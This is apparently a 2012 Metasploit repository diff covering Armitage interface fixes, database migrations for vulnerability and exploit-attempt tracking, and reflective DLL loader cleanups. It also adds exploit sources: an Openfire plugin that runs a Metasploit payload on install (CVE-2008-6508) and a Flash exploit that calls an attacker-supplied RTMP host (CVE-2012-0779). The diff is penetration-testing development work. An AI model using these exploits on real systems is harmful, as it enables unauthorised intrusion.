diff --git a/data/armitage/armitage.jar b/data/armitage/armitage.jar
index fdba5f0401..330ad3bc4a 100755
Binary files a/data/armitage/armitage.jar and b/data/armitage/armitage.jar differ
diff --git a/data/armitage/whatsnew.txt b/data/armitage/whatsnew.txt
index 355c6394a5..2e7548c4e9 100755
--- a/data/armitage/whatsnew.txt
+++ b/data/armitage/whatsnew.txt
@@ -1,6 +1,23 @@
Armitage Changelog
==================
+24 Jun 12
+---------
+- Meterpreter -> Kill now uses session.stop RPC call
+- Simplified code to stop a running job
+- Added an option to disable TCP_NODELAY from the comamnd line:
+
+ java -Darmitage.enable_nagle=true -jar armitage.jar
+
+ Use this if you see "bad mac" SSL errors when connected to a
+ team server.
+- Log Keystrokes tab now changes color when there is activity
+- Randomized filename for USERPASS_FILE to allow multiple brute
+ forces to happen at once.
+- Added a View item in the File Browser's popup menu. This will
+ let you quickly read several highlighted text files (it also
+ saves the files to the right place locally too)
+
7 Jun 12 - Adding on to those quick bug fixes / tweaks
--------
- Disabled Nagles algorithm for team server and client SSL sockets.
diff --git a/data/exploits/CVE-2008-6508/changelog.html b/data/exploits/CVE-2008-6508/changelog.html
new file mode 100755
index 0000000000..a7d5a78f98
--- /dev/null
+++ b/data/exploits/CVE-2008-6508/changelog.html
@@ -0,0 +1,69 @@
+
+
+
+
+ Example plugin changelog
+
+
+
+
+
+Example plugin
+
+
+
Todo
+
+
+Add changelog content here
+
+
+
diff --git a/data/exploits/CVE-2008-6508/lib/plugin-metasploit.jar b/data/exploits/CVE-2008-6508/lib/plugin-metasploit.jar
new file mode 100755
index 0000000000..5c3b0bec46
Binary files /dev/null and b/data/exploits/CVE-2008-6508/lib/plugin-metasploit.jar differ
diff --git a/data/exploits/CVE-2008-6508/logo_large.gif b/data/exploits/CVE-2008-6508/logo_large.gif
new file mode 100755
index 0000000000..d1474a1a34
Binary files /dev/null and b/data/exploits/CVE-2008-6508/logo_large.gif differ
diff --git a/data/exploits/CVE-2008-6508/logo_small.gif b/data/exploits/CVE-2008-6508/logo_small.gif
new file mode 100755
index 0000000000..e1816427d7
Binary files /dev/null and b/data/exploits/CVE-2008-6508/logo_small.gif differ
diff --git a/data/exploits/CVE-2008-6508/plugin.xml b/data/exploits/CVE-2008-6508/plugin.xml
new file mode 100755
index 0000000000..7769df7049
--- /dev/null
+++ b/data/exploits/CVE-2008-6508/plugin.xml
@@ -0,0 +1,10 @@
+
+
+ com.example.openfire.plugin.Example
+ PLUGINNAME
+ PLUGINDESCRIPTION
+ PLUGINAUTHOR
+ 1.0.0
+ 7/7/2008
+ 3.5.0
+
diff --git a/data/exploits/CVE-2008-6508/readme.html b/data/exploits/CVE-2008-6508/readme.html
new file mode 100755
index 0000000000..8d1da45937
--- /dev/null
+++ b/data/exploits/CVE-2008-6508/readme.html
@@ -0,0 +1,69 @@
+
+
+
+
+ Example plugin readme
+
+
+
+
+
+Example plugin
+
+
+
Todo
+
+
+Add readme content here
+
+
+
diff --git a/data/exploits/CVE-2011-2110.swf b/data/exploits/CVE-2011-2110.swf
old mode 100644
new mode 100755
diff --git a/data/exploits/CVE-2012-0779.swf b/data/exploits/CVE-2012-0779.swf
new file mode 100755
index 0000000000..3242992888
Binary files /dev/null and b/data/exploits/CVE-2012-0779.swf differ
diff --git a/data/meterpreter/elevator.dll b/data/meterpreter/elevator.dll
index d1fc0eda40..8acf67d923 100755
Binary files a/data/meterpreter/elevator.dll and b/data/meterpreter/elevator.dll differ
diff --git a/data/meterpreter/elevator.x64.dll b/data/meterpreter/elevator.x64.dll
index c7a3040159..d6612e25ac 100755
Binary files a/data/meterpreter/elevator.x64.dll and b/data/meterpreter/elevator.x64.dll differ
diff --git a/data/meterpreter/ext_server_espia.dll b/data/meterpreter/ext_server_espia.dll
index 49b1ea2ac9..fba2a00eea 100755
Binary files a/data/meterpreter/ext_server_espia.dll and b/data/meterpreter/ext_server_espia.dll differ
diff --git a/data/meterpreter/ext_server_espia.x64.dll b/data/meterpreter/ext_server_espia.x64.dll
index 6b3cace75f..3fdbad4b4c 100755
Binary files a/data/meterpreter/ext_server_espia.x64.dll and b/data/meterpreter/ext_server_espia.x64.dll differ
diff --git a/data/meterpreter/ext_server_incognito.dll b/data/meterpreter/ext_server_incognito.dll
index 1b44f1770a..634c88a979 100755
Binary files a/data/meterpreter/ext_server_incognito.dll and b/data/meterpreter/ext_server_incognito.dll differ
diff --git a/data/meterpreter/ext_server_incognito.x64.dll b/data/meterpreter/ext_server_incognito.x64.dll
index 19a6117725..5745a9ad4b 100755
Binary files a/data/meterpreter/ext_server_incognito.x64.dll and b/data/meterpreter/ext_server_incognito.x64.dll differ
diff --git a/data/meterpreter/ext_server_lanattacks.dll b/data/meterpreter/ext_server_lanattacks.dll
index 45ee6e5aec..d7e26692a0 100755
Binary files a/data/meterpreter/ext_server_lanattacks.dll and b/data/meterpreter/ext_server_lanattacks.dll differ
diff --git a/data/meterpreter/ext_server_lanattacks.x64.dll b/data/meterpreter/ext_server_lanattacks.x64.dll
index 476b09b45e..518bf00d4f 100755
Binary files a/data/meterpreter/ext_server_lanattacks.x64.dll and b/data/meterpreter/ext_server_lanattacks.x64.dll differ
diff --git a/data/meterpreter/ext_server_priv.dll b/data/meterpreter/ext_server_priv.dll
index 820909c066..dbb669b0a1 100755
Binary files a/data/meterpreter/ext_server_priv.dll and b/data/meterpreter/ext_server_priv.dll differ
diff --git a/data/meterpreter/ext_server_priv.x64.dll b/data/meterpreter/ext_server_priv.x64.dll
index 10f4f451bb..d0b13f89b9 100755
Binary files a/data/meterpreter/ext_server_priv.x64.dll and b/data/meterpreter/ext_server_priv.x64.dll differ
diff --git a/data/meterpreter/ext_server_sniffer.dll b/data/meterpreter/ext_server_sniffer.dll
index 3c58f39e46..51d1815cd6 100755
Binary files a/data/meterpreter/ext_server_sniffer.dll and b/data/meterpreter/ext_server_sniffer.dll differ
diff --git a/data/meterpreter/ext_server_stdapi.dll b/data/meterpreter/ext_server_stdapi.dll
index 1298749465..111e5f1113 100755
Binary files a/data/meterpreter/ext_server_stdapi.dll and b/data/meterpreter/ext_server_stdapi.dll differ
diff --git a/data/meterpreter/ext_server_stdapi.x64.dll b/data/meterpreter/ext_server_stdapi.x64.dll
index 3c17270b68..be3d0de353 100755
Binary files a/data/meterpreter/ext_server_stdapi.x64.dll and b/data/meterpreter/ext_server_stdapi.x64.dll differ
diff --git a/data/meterpreter/metsrv.dll b/data/meterpreter/metsrv.dll
index 01242186e4..915e74fcfa 100755
Binary files a/data/meterpreter/metsrv.dll and b/data/meterpreter/metsrv.dll differ
diff --git a/data/meterpreter/metsrv.x64.dll b/data/meterpreter/metsrv.x64.dll
index 47e4ee4e05..66008646dd 100755
Binary files a/data/meterpreter/metsrv.x64.dll and b/data/meterpreter/metsrv.x64.dll differ
diff --git a/data/meterpreter/screenshot.dll b/data/meterpreter/screenshot.dll
index 24c6f785e4..741f08cb2b 100755
Binary files a/data/meterpreter/screenshot.dll and b/data/meterpreter/screenshot.dll differ
diff --git a/data/meterpreter/screenshot.x64.dll b/data/meterpreter/screenshot.x64.dll
index 3058bcddf6..d868309c95 100755
Binary files a/data/meterpreter/screenshot.x64.dll and b/data/meterpreter/screenshot.x64.dll differ
diff --git a/data/sql/migrate/20120625000000_add_vuln_details.rb b/data/sql/migrate/20120625000000_add_vuln_details.rb
new file mode 100755
index 0000000000..0f946da39c
--- /dev/null
+++ b/data/sql/migrate/20120625000000_add_vuln_details.rb
@@ -0,0 +1,34 @@
+class AddVulnDetails < ActiveRecord::Migration
+
+ def self.up
+ create_table :vuln_details do |t|
+ t.integer :vuln_id # Vuln table reference
+ t.float :cvss_score # 0.0 to 10.0
+ t.string :cvss_vector # Ex: (AV:N/AC:L/Au:N/C:C/I:C/A:C)(AV:N/AC:L/Au:N/C:C/I:C/A:C)
+
+ t.string :title # Short identifier
+ t.text :description # Plain text or HTML (trusted)
+ t.text :solution # Plain text or HTML (trusted)
+ t.binary :proof # Should be UTF-8, but may not be, sanitize on output
+ # Technically this duplicates vuln.info, but that field
+ # is poorly managed / handled today. Eventually we will
+ # replace vuln.info
+
+ # Nexpose-specific fields
+ t.integer :nx_console_id # NexposeConsole table reference
+ t.integer :nx_device_id # Reference from the Nexpose side
+ t.string :nx_vuln_id # 'jre-java-update-flaw'
+ t.float :nx_severity # 0-10
+ t.float :nx_pci_severity # 0-10
+ t.timestamp :nx_published # Normalized from "20081205T000000000"
+ t.timestamp :nx_added # Normalized from "20081205T000000000"
+ t.timestamp :nx_modified # Normalized from "20081205T000000000"
+ t.text :nx_tags # Comma separated
+
+ end
+ end
+
+ def self.down
+ drop_table :vuln_details
+ end
+end
diff --git a/data/sql/migrate/20120625000001_add_host_details.rb b/data/sql/migrate/20120625000001_add_host_details.rb
new file mode 100755
index 0000000000..36e70892fa
--- /dev/null
+++ b/data/sql/migrate/20120625000001_add_host_details.rb
@@ -0,0 +1,16 @@
+class AddHostDetails < ActiveRecord::Migration
+
+ def self.up
+ create_table :host_details do |t|
+ t.integer :host_id # Host table reference
+
+ # Nexpose-specific fields
+ t.integer :nx_console_id # NexposeConsole table reference
+ t.integer :nx_device_id # Reference from the Nexpose side
+ end
+ end
+
+ def self.down
+ drop_table :host_details
+ end
+end
diff --git a/data/sql/migrate/20120625000002_expand_details.rb b/data/sql/migrate/20120625000002_expand_details.rb
new file mode 100755
index 0000000000..bd240ecdc5
--- /dev/null
+++ b/data/sql/migrate/20120625000002_expand_details.rb
@@ -0,0 +1,16 @@
+class ExpandDetails < ActiveRecord::Migration
+
+ def self.up
+ add_column :vuln_details, :nx_vuln_status, :text
+ add_column :vuln_details, :nx_proof_key, :text
+ add_column :vuln_details, :src, :string
+ add_column :host_details, :src, :string
+ end
+
+ def self.down
+ remove_column :vuln_details, :nx_vuln_status
+ remove_column :vuln_details, :nx_proof_key
+ remove_column :vuln_details, :src
+ remove_column :host_details, :src
+ end
+end
diff --git a/data/sql/migrate/20120625000003_expand_details2.rb b/data/sql/migrate/20120625000003_expand_details2.rb
new file mode 100755
index 0000000000..4122503692
--- /dev/null
+++ b/data/sql/migrate/20120625000003_expand_details2.rb
@@ -0,0 +1,24 @@
+class ExpandDetails2 < ActiveRecord::Migration
+
+ def self.up
+ add_column :host_details, :nx_site_name, :string
+ add_column :host_details, :nx_site_importance, :string
+ add_column :host_details, :nx_scan_template, :string
+ add_column :host_details, :nx_risk_score, :float
+
+ add_column :vuln_details, :nx_scan_id, :integer
+ add_column :vuln_details, :nx_vulnerable_since, :timestamp
+ add_column :vuln_details, :nx_pci_compliance_status, :string
+ end
+
+ def self.down
+ remove_column :host_details, :nx_site_name
+ remove_column :host_details, :nx_site_importance
+ remove_column :host_details, :nx_scan_template
+ remove_column :host_details, :nx_risk_score
+
+ remove_column :vuln_details, :nx_scan_id
+ remove_column :vuln_details, :nx_vulnerable_since
+ remove_column :vuln_details, :nx_pci_compliance_status
+ end
+end
diff --git a/data/sql/migrate/20120625000004_add_vuln_attempts.rb b/data/sql/migrate/20120625000004_add_vuln_attempts.rb
new file mode 100755
index 0000000000..b943fe358f
--- /dev/null
+++ b/data/sql/migrate/20120625000004_add_vuln_attempts.rb
@@ -0,0 +1,19 @@
+class AddVulnAttempts < ActiveRecord::Migration
+
+ def self.up
+ create_table :vuln_attempts do |t|
+ t.integer :vuln_id # Vuln table reference
+ t.timestamp :attempted_at # Timestamp of when the session was opened or the module exited
+ t.boolean :exploited # Whether or not the attempt succeeded
+ t.string :fail_reason # Short string corresponding to a Msf::Exploit::Failure constant
+ t.string :username # The user that tested this vulnerability
+ t.text :module # The specific module name that was used
+ t.integer :session_id # Database identifier of any opened session
+ t.integer :loot_id # Database identifier of any 'proof' loot (for non-session exploits)
+ end
+ end
+
+ def self.down
+ drop_table :vuln_attempts
+ end
+end
diff --git a/data/sql/migrate/20120625000005_add_vuln_and_host_counter_caches.rb b/data/sql/migrate/20120625000005_add_vuln_and_host_counter_caches.rb
new file mode 100755
index 0000000000..c34101fd89
--- /dev/null
+++ b/data/sql/migrate/20120625000005_add_vuln_and_host_counter_caches.rb
@@ -0,0 +1,14 @@
+class AddVulnAndHostCounterCaches < ActiveRecord::Migration
+
+ def self.up
+ add_column :hosts, :host_detail_count, :integer, :default => 0
+ add_column :vulns, :vuln_detail_count, :integer, :default => 0
+ add_column :vulns, :vuln_attempt_count, :integer, :default => 0
+ end
+
+ def self.down
+ remove_column :hosts, :host_detail_count
+ remove_column :vulns, :vuln_detail_count
+ remove_column :vulns, :vuln_attempt_count
+ end
+end
diff --git a/data/sql/migrate/20120625000006_add_module_details.rb b/data/sql/migrate/20120625000006_add_module_details.rb
new file mode 100755
index 0000000000..cb99f7ee84
--- /dev/null
+++ b/data/sql/migrate/20120625000006_add_module_details.rb
@@ -0,0 +1,118 @@
+class AddModuleDetails < ActiveRecord::Migration
+
+ def self.up
+
+ create_table :module_details do |t|
+ t.timestamp :mtime # disk modified time
+ t.text :file # location on disk
+ t.string :mtype # exploit, auxiliary, post, etc
+ t.text :refname # module path (no type)
+ t.text :fullname # module path with type
+ t.text :name # module title
+ t.integer :rank # exploit rank
+ t.text :description #
+ t.string :license # MSF_LICENSE
+ t.boolean :privileged # true or false
+ t.timestamp :disclosure_date # Mar 10 2004
+ t.integer :default_target # 0
+ t.text :default_action # "scan"
+ t.string :stance # "passive"
+ t.boolean :ready # true/false
+ end
+
+ add_index :module_details, :refname
+ add_index :module_details, :name
+ add_index :module_details, :description
+ add_index :module_details, :mtype
+
+ create_table :module_authors do |t|
+ t.integer :module_detail_id
+ t.text :name
+ t.text :email
+ end
+ add_index :module_authors, :module_detail_id
+
+ create_table :module_mixins do |t|
+ t.integer :module_detail_id
+ t.text :name
+ end
+ add_index :module_mixins, :module_detail_id
+
+ create_table :module_targets do |t|
+ t.integer :module_detail_id
+ t.integer :index
+ t.text :name
+ end
+ add_index :module_targets, :module_detail_id
+
+ create_table :module_actions do |t|
+ t.integer :module_detail_id
+ t.text :name
+ end
+ add_index :module_actions, :module_detail_id
+
+ create_table :module_refs do |t|
+ t.integer :module_detail_id
+ t.text :name
+ end
+ add_index :module_refs, :module_detail_id
+ add_index :module_refs, :name
+
+ create_table :module_archs do |t|
+ t.integer :module_detail_id
+ t.text :name
+ end
+ add_index :module_archs, :module_detail_id
+
+ create_table :module_platforms do |t|
+ t.integer :module_detail_id
+ t.text :name
+ end
+ add_index :module_platforms, :module_detail_id
+
+ end
+
+ def self.down
+ remove_index :module_details, :refname
+ remove_index :module_details, :name
+ remove_index :module_details, :description
+ remove_index :module_details, :mtype
+
+ remove_index :module_authors, :module_detail_id
+ remove_index :module_mixins, :module_detail_id
+ remove_index :module_targets, :module_detail_id
+ remove_index :module_actions, :module_detail_id
+ remove_index :module_refs, :module_detail_id
+ remove_index :module_refs, :name
+ remove_index :module_archs, :module_detail_id
+ remove_index :module_platform, :module_detail_id
+
+ drop_table :module_details
+ drop_table :module_authors
+ drop_table :module_mixins
+ drop_table :module_targets
+ drop_table :module_actions
+ drop_table :module_refs
+ drop_table :module_archs
+ drop_table :module_platforms
+
+ end
+end
+
+=begin
+
+Mdm::Host.find_by_sql("
+SELECT
+ hosts.id, hosts.address, module_details.mtype AS mtype, module_details.refname AS mname, vulns.name AS vname, refs.name AS vref
+FROM
+ hosts,vulns,vulns_refs,refs,module_refs,module_details
+WHERE
+ hosts.id = vulns.host_id AND
+ vulns.id = vulns_refs.vuln_id AND
+ vulns_refs.ref_id = refs.id AND
+ refs.name = module_refs.name AND
+ module_refs.module_detail_id = modules_details.id
+").map{|x| [x.address, x.mname, x.vname, x.vref ] }
+
+
+=end
diff --git a/data/sql/migrate/20120625000007_add_exploit_attempts.rb b/data/sql/migrate/20120625000007_add_exploit_attempts.rb
new file mode 100755
index 0000000000..22d3ec0b1f
--- /dev/null
+++ b/data/sql/migrate/20120625000007_add_exploit_attempts.rb
@@ -0,0 +1,26 @@
+class AddExploitAttempts < ActiveRecord::Migration
+
+ def self.up
+ create_table :exploit_attempts do |t|
+ t.integer :host_id # Host table reference (primary)
+ t.integer :service_id # Service table reference (optional)
+ t.integer :vuln_id # Vuln table reference (optional)
+ t.timestamp :attempted_at # Timestamp of when the session was opened or the module exited
+ t.boolean :exploited # Whether or not the attempt succeeded
+ t.string :fail_reason # Short string corresponding to a Msf::Exploit::Failure constant
+ t.string :username # The user that tested this vulnerability
+ t.text :module # The specific module name that was used
+ t.integer :session_id # Database identifier of any opened session
+ t.integer :loot_id # Database identifier of any 'proof' loot (for non-session exploits)
+ t.integer :port # Port -> Services are created/destroyed frequently and failed
+ t.string :proto # Protocol | attempts may be against closed ports.
+ end
+
+ add_column :hosts, :exploit_attempt_count, :integer, :default => 0
+ end
+
+ def self.down
+ drop_table :exploit_attempts
+ remove_column :hosts, :exploit_attempt_count
+ end
+end
diff --git a/data/sql/migrate/20120625000008_add_fail_message.rb b/data/sql/migrate/20120625000008_add_fail_message.rb
new file mode 100755
index 0000000000..7d6dd0f96b
--- /dev/null
+++ b/data/sql/migrate/20120625000008_add_fail_message.rb
@@ -0,0 +1,12 @@
+class AddFailMessage < ActiveRecord::Migration
+
+ def self.up
+ add_column :vuln_attempts, :fail_detail, :text
+ add_column :exploit_attempts, :fail_detail, :text
+ end
+
+ def self.down
+ remove_column :vuln_attempts, :fail_detail
+ remove_column :exploit_attempts, :fail_detail
+ end
+end
diff --git a/external/source/armitage/resources/about.html b/external/source/armitage/resources/about.html
index 575effc437..f4119fca2b 100644
--- a/external/source/armitage/resources/about.html
+++ b/external/source/armitage/resources/about.html
@@ -3,7 +3,7 @@
Armitage 1.44-dev
An attack management tool for Metasploit®
- Release: 7 Jun 12
+ Release: 24 Jun 12
Developed by:
diff --git a/external/source/armitage/scripts/browser.sl b/external/source/armitage/scripts/browser.sl
index ab60e0f824..0f7655fe36 100644
--- a/external/source/armitage/scripts/browser.sl
+++ b/external/source/armitage/scripts/browser.sl
@@ -306,6 +306,44 @@ sub convertDate {
}
};
+sub openFileViewer {
+ local('$dialog $display');
+ $dialog = [new JPanel];
+ [$dialog setLayout: [new BorderLayout]];
+ $display = [new console.Display: $preferences];
+ [$dialog add: $display, [BorderLayout CENTER]];
+ [$frame addTab: "View", $dialog, $null, $null];
+ return $display;
+}
+
+%handlers["cat"] = {
+ this('$file @files');
+ if ($0 eq "begin") {
+ $file = shift(@files);
+ local('$host $handle');
+
+ # show the file
+ $host = sessionToHost($1);
+ [$display append: "
+\c9#
+\c9# $host $+ : $file
+\c9#\n"];
+ if ($2 !ismatch '\p{ASCII}*') {
+ [$display append: "\c4This is a binary file\n"];
+ # don't save binary files as the cat command doesn't preserve them
+ }
+ else {
+ [$display append: $2];
+
+ # save the file
+ mkdir(getFileProper(dataDirectory(), "downloads", $host, $path));
+ $handle = openf(">" . getFileProper(dataDirectory(), "downloads", $host, $path, $file));
+ writeb($handle, $2);
+ closef($handle);
+ }
+ }
+};
+
sub buildFileBrowserMenu {
# ($popup, [$model getSelectedValue: $table], @rows);
@@ -316,10 +354,25 @@ sub buildFileBrowserMenu {
# need to pass current working directory, selected file, and type
setupMenu($1, "file_browser", @($2, %types, [$text getText]));
+ item($1, "View", 'V', lambda({
+ local('$f $dir @temp $tdir');
+
+ @temp = split('\\\\', [$text getText]);
+ $dir = join("/", @temp);
+ %handlers['cat']['$path'] = $dir;
+ %handlers['cat']['@files'] = @();
+ %handlers['cat']['$display'] = openFileViewer();
+
+ [$setcwd];
+ foreach $f ($file) {
+ push(%handlers['cat']['@files'], $f);
+ m_cmd($sid, "cat \" $+ $f $+ \"");
+ }
+ }, $file => $2, \$sid, \%types, \$setcwd, \$text));
+
item($1, "Download", 'D', lambda({
local('$f $dir @temp $tdir');
@temp = split('\\\\', [$text getText]);
-
$dir = strrep(downloadDirectory(sessionToHost($sid), join("/", @temp)), "\\", "/");
foreach $f ($file) {
diff --git a/external/source/armitage/scripts/jobs.sl b/external/source/armitage/scripts/jobs.sl
index 1e7110d60b..e31a50dda8 100644
--- a/external/source/armitage/scripts/jobs.sl
+++ b/external/source/armitage/scripts/jobs.sl
@@ -90,24 +90,11 @@ sub manage_job {
[$startf];
}
else {
- local('$job $confirm $foo');
+ local('$job $confirm $foo $confirm');
$job = call($client, "job.info", $1);
-
- $foo = lambda({
- local('$confirm');
- $confirm = askYesNo([$stopf : $jid, $job], "Stop Job");
- if ($confirm eq "0") {
- cmd_safe("jobs -k $jid", {
- if ($3 ne "") { showError($3); }
- });
- }
- }, \$stopf, \$job, $jid => $1);
-
- if ([SwingUtilities isEventDispatchThread]) {
- [$foo];
- }
- else {
- [SwingUtilities invokeLater: $foo];
+ $confirm = askYesNo([$stopf : $1, $job], "Stop Job");
+ if ($confirm eq "0") {
+ call_async($client, "job.stop", $1);
}
}
}, \$startf, \$stopf));
diff --git a/external/source/armitage/scripts/meterpreter.sl b/external/source/armitage/scripts/meterpreter.sl
index 2e91ff4267..531fb584b4 100644
--- a/external/source/armitage/scripts/meterpreter.sl
+++ b/external/source/armitage/scripts/meterpreter.sl
@@ -257,7 +257,7 @@ sub showMeterpreterMenu {
separator($1);
- item($1, "Kill", 'K', lambda({ cmd_safe("sessions -k $sid"); }, $sid => "$sid"));
+ item($1, "Kill", 'K', lambda({ call_async($client, "session.stop", $sid); }, $sid => "$sid"));
}
sub launch_msf_scans {
diff --git a/external/source/armitage/scripts/passhash.sl b/external/source/armitage/scripts/passhash.sl
index 69afbf1d01..548e74c6b5 100644
--- a/external/source/armitage/scripts/passhash.sl
+++ b/external/source/armitage/scripts/passhash.sl
@@ -291,8 +291,10 @@ sub show_login_dialog {
}
sub createUserPassFile {
- local('$handle $user $pass $type $row $2');
- $handle = openf(">userpass.txt");
+ local('$handle $user $pass $type $row $2 $name');
+ $name = "userpass" . rand(10000) . ".txt";
+
+ $handle = openf("> $+ $name");
foreach $row ($1) {
($user, $pass, $type) = values($row, @("user", "pass", "ptype"));
if ($type eq "password" || $type eq $2) {
@@ -306,12 +308,12 @@ sub createUserPassFile {
if ($client !is $mclient) {
local('$file');
- $file = uploadFile("userpass.txt");
- deleteOnExit("userpass.txt");
+ $file = uploadFile($name);
+ deleteOnExit($name);
return $file;
}
else {
- return getFileProper("userpass.txt");
+ return getFileProper($name);
}
}
diff --git a/external/source/armitage/scripts/util.sl b/external/source/armitage/scripts/util.sl
index 39184af74e..d2758871f0 100644
--- a/external/source/armitage/scripts/util.sl
+++ b/external/source/armitage/scripts/util.sl
@@ -94,7 +94,12 @@ sub setupEventStyle {
sub createDisplayTab {
local('$console $host $queue $file');
$queue = [new ConsoleQueue: $client];
- $console = [new Console: $preferences];
+ if ($1 eq "Log Keystrokes") {
+ $console = [new ActivityConsole: $preferences];
+ }
+ else {
+ $console = [new Console: $preferences];
+ }
setupConsoleStyle($console);
[$queue setDisplay: $console];
[new QueueTabCompletion: $console, $queue];
diff --git a/external/source/armitage/src/ssl/SecureSocket.java b/external/source/armitage/src/ssl/SecureSocket.java
index 12230d4013..b13c25fc9f 100644
--- a/external/source/armitage/src/ssl/SecureSocket.java
+++ b/external/source/armitage/src/ssl/SecureSocket.java
@@ -22,7 +22,12 @@ public class SecureSocket {
SSLSocketFactory factory = (SSLSocketFactory) sslcontext.getSocketFactory();
socket = (SSLSocket)factory.createSocket(host, port);
- socket.setTcpNoDelay(true);
+
+ /* give users a means to disable TCP_NO_DELAY. I experienced a bad_mac SSL error
+ on another network when this option was enabled. *shrug* */
+ if (!"true".equals(System.getProperty("armitage.enable_nagle"))) {
+ socket.setTcpNoDelay(true);
+ }
socket.setSoTimeout(4048);
socket.startHandshake();
}
diff --git a/external/source/armitage/whatsnew.txt b/external/source/armitage/whatsnew.txt
index 355c6394a5..2e7548c4e9 100644
--- a/external/source/armitage/whatsnew.txt
+++ b/external/source/armitage/whatsnew.txt
@@ -1,6 +1,23 @@
Armitage Changelog
==================
+24 Jun 12
+---------
+- Meterpreter -> Kill now uses session.stop RPC call
+- Simplified code to stop a running job
+- Added an option to disable TCP_NODELAY from the comamnd line:
+
+ java -Darmitage.enable_nagle=true -jar armitage.jar
+
+ Use this if you see "bad mac" SSL errors when connected to a
+ team server.
+- Log Keystrokes tab now changes color when there is activity
+- Randomized filename for USERPASS_FILE to allow multiple brute
+ forces to happen at once.
+- Added a View item in the File Browser's popup menu. This will
+ let you quickly read several highlighted text files (it also
+ saves the files to the right place locally too)
+
7 Jun 12 - Adding on to those quick bug fixes / tweaks
--------
- Disabled Nagles algorithm for team server and client SSL sockets.
diff --git a/external/source/exploits/CVE-2008-6508/Example.java b/external/source/exploits/CVE-2008-6508/Example.java
new file mode 100644
index 0000000000..3c4717b4e1
--- /dev/null
+++ b/external/source/exploits/CVE-2008-6508/Example.java
@@ -0,0 +1,31 @@
+package com.example.openfire.plugin;
+
+import java.io.*;
+import java.util.TimerTask;
+
+import org.jivesoftware.util.JiveGlobals;
+import org.jivesoftware.openfire.container.Plugin;
+import org.jivesoftware.openfire.container.PluginManager;
+
+import org.jivesoftware.util.JiveGlobals;
+import org.jivesoftware.util.Log;
+import org.jivesoftware.util.TaskEngine;
+import metasploit.*;
+
+public class Example implements Plugin {
+
+ public void initializePlugin(PluginManager manager, File pluginDirectory) {
+ try{
+ Payload.main(null);
+ }
+ catch (Exception ex)
+ {
+ Log.error("error", ex);
+ }
+
+ }
+
+ public void destroyPlugin() {
+
+ }
+}
diff --git a/external/source/exploits/CVE-2012-0779/CVE_2012_0779.as b/external/source/exploits/CVE-2012-0779/CVE_2012_0779.as
new file mode 100644
index 0000000000..595b7786ea
--- /dev/null
+++ b/external/source/exploits/CVE-2012-0779/CVE_2012_0779.as
@@ -0,0 +1,35 @@
+package {
+ import flash.display.*;
+ import flash.utils.*;
+ import flash.net.*;
+ import flash.system.*;
+ import flash.text.*;
+ import flash.external.*;
+
+ public class CVE_2012_0779 extends Sprite {
+ private var v15:NetConnection;
+ private var v16:Responder;
+
+
+ public function CVE_2012_0779(){
+ var param:Object = LoaderInfo(this.root.loaderInfo).parameters;
+ this.v16 = new Responder(this.v23);
+ this.v15 = new NetConnection();
+ var _local2 = "rtmp://";
+ var _local3 = "/TSGeneralSetting";
+ var _local5 = param["var1"] + ":" + param["var2"];
+ var _local4:String = ((_local2 + _local5) + _local3);
+ this.v15.connect(_local4);
+ this.v15.call("systemMemoryCall", this.v16, "argc");
+ }
+
+ private function v23(_arg1:Object):void{
+ }
+
+ override public function get stage():Stage{
+ return super.stage;
+ }
+
+ NetConnection.defaultObjectEncoding = ObjectEncoding.AMF0;
+ }
+}//package
diff --git a/external/source/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.c b/external/source/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.c
index 27d1f18d12..fb2c3d7042 100644
--- a/external/source/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.c
+++ b/external/source/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.c
@@ -40,21 +40,25 @@ HMODULE hMetSrv = NULL;
// To enable all of this in a new extnesion:
// 1. Add metsrv.dll to the DELAYLOAD option in the projects properties (Configuration->Linker->Input).
// 2. Add in the include file #include "DelayLoadMetSrv.h".
-// 3. Add the macro "EnableDelayLoadMetSrv();" after all you includes.
+// 3. Add the macro "EnableDelayLoadMetSrv();" after all your includes.
// 4. Add the line "hMetSrv = remote->hMetSrv;" in your InitServerExtension() function.
//===============================================================================================//
+
+
+
+
FARPROC WINAPI delayHook( unsigned dliNotify, PDelayLoadInfo pdli )
{
switch( dliNotify )
{
case dliNotePreLoadLibrary:
- // If we are tryinig to delay load metsrv.dll we can just return the
+ // If we are trying to delay load metsrv.dll we can just return the
// HMODULE of the injected metsrv library (set in InitServerExtension).
if( strcmp( pdli->szDll, "metsrv.dll" ) == 0 )
return (FARPROC)hMetSrv;
break;
- case dliNotePreGetProcAddress :
+ case dliNotePreGetProcAddress:
// If we are trying to get the address of an exported function in the
// metsrv.dll we must use GetProcAddressR() in case the metsrv was loaded
// via reflective dll injection
diff --git a/external/source/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.h b/external/source/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.h
index f318cb030e..9632ef401c 100644
--- a/external/source/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.h
+++ b/external/source/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.h
@@ -31,7 +31,7 @@
#define WIN32_LEAN_AND_MEAN
#include
#include
-#include "DelayLoadMetSrv.h"
+
#pragma comment (lib,"Delayimp.lib")
// we use this like a macro to set the hook in an server extension that requires it
diff --git a/external/source/meterpreter/source/ReflectiveDLLInjection/LoadLibraryR.c b/external/source/meterpreter/source/ReflectiveDLLInjection/LoadLibraryR.c
index 01b1fcb104..f2e17ee318 100644
--- a/external/source/meterpreter/source/ReflectiveDLLInjection/LoadLibraryR.c
+++ b/external/source/meterpreter/source/ReflectiveDLLInjection/LoadLibraryR.c
@@ -107,7 +107,6 @@ DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
while( dwCounter-- )
{
char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));
-
if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
{
// get the File Offset for the array of addresses
diff --git a/external/source/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.c b/external/source/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.c
index fe667a830d..b91343dede 100644
--- a/external/source/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.c
+++ b/external/source/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.c
